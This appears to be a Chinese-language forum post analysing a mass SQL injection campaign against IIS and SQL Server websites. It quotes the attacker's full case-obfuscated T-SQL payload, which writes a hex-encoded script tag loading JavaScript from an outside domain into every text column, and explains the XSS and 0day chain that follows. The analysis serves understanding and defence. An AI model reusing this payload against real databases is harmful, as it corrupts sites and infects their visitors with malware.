引用:
|
作者野口隆史
這是針對iis的sql代碼注入攻擊
只發生在windows平台上,目前全世界已知被攻擊的網站已經超過50萬了
|
野口兄說對了..是 SQL Injection 沒錯..不愧是長期在關心相關資訊的高手
剛剛追蹤了 script 後.. 用一些關鍵字去查之後大致了解情況了..
是屬於 SQL Injection + XSS + 0day 混合攻擊型的..
(0day是指在安全補丁發佈前而被了解和掌握的漏洞資訊。)
SQL Injection 使用的 Code 如下..
引用:
|
作者SQL Injection Code
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(‘UpDaTe [’+@t+‘sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD
AnD a.xTyPe=‘u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(‘UpDaTe [’+@t+‘] sEt [’+@c+‘]=rtrim(convert(varchar,[’+@c+‘]))+cAsT
(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
C2F7363726970743E3C212D2D aS vArChAr(67))’)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR
|
攻擊者很細心的用了大小寫交錯避開一般程式中對Request的檢查..
對SQL Server資料庫裡面
xtype=99 ntext
xtype=35 text
xtype=231 nvarchar
xtype=167 varchar
四種資料型態進行 update ..
塞入的資料十六進位為
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
轉換為字串即是"></title><script src=http://s.see9.us/s.js></script><!--
這裡再次展現攻擊者的細心 =_= .. 用十六進位代碼取代容易被抓到的 html script ..
因為主攻 sql server .. 所以看起來都是 IIS 中標.. 畢竟一般後台 DB 會用 sql server 的情況下..前台大都是 IIS + ASP (.NET) ..
接下來使用 XSS Attack 讓網站瀏覽者的瀏覽器執行攻擊者安排的 Java Script ..
用 0day 鑽漏洞取得網站瀏覽者本機一定的權限..之前的0day漏洞是抓 real play 的..
但只要攻擊者高興..只要替換 script 隨時可以用其他 0day 漏洞攻擊瀏覽者本機 ..
最後是攻擊者的目的..
應該是 "點廣告" .. 利用三重機制將木馬傳播出去之後 .. 幫攻擊者點網路****賺錢
..
小弟是參考綜合兩份大陸論壇資料做出的結論..
為免直接連接論壇的危險..所以提供兩份Google 文字快取供板友們參考 ..
http://72.14.235.104/search?q=cache...x&gl=tw&strip=1
http://72.14.235.104/search?q=cache...l=zh-TW&strip=1
僅供參考..有錯歡迎用力吐草~~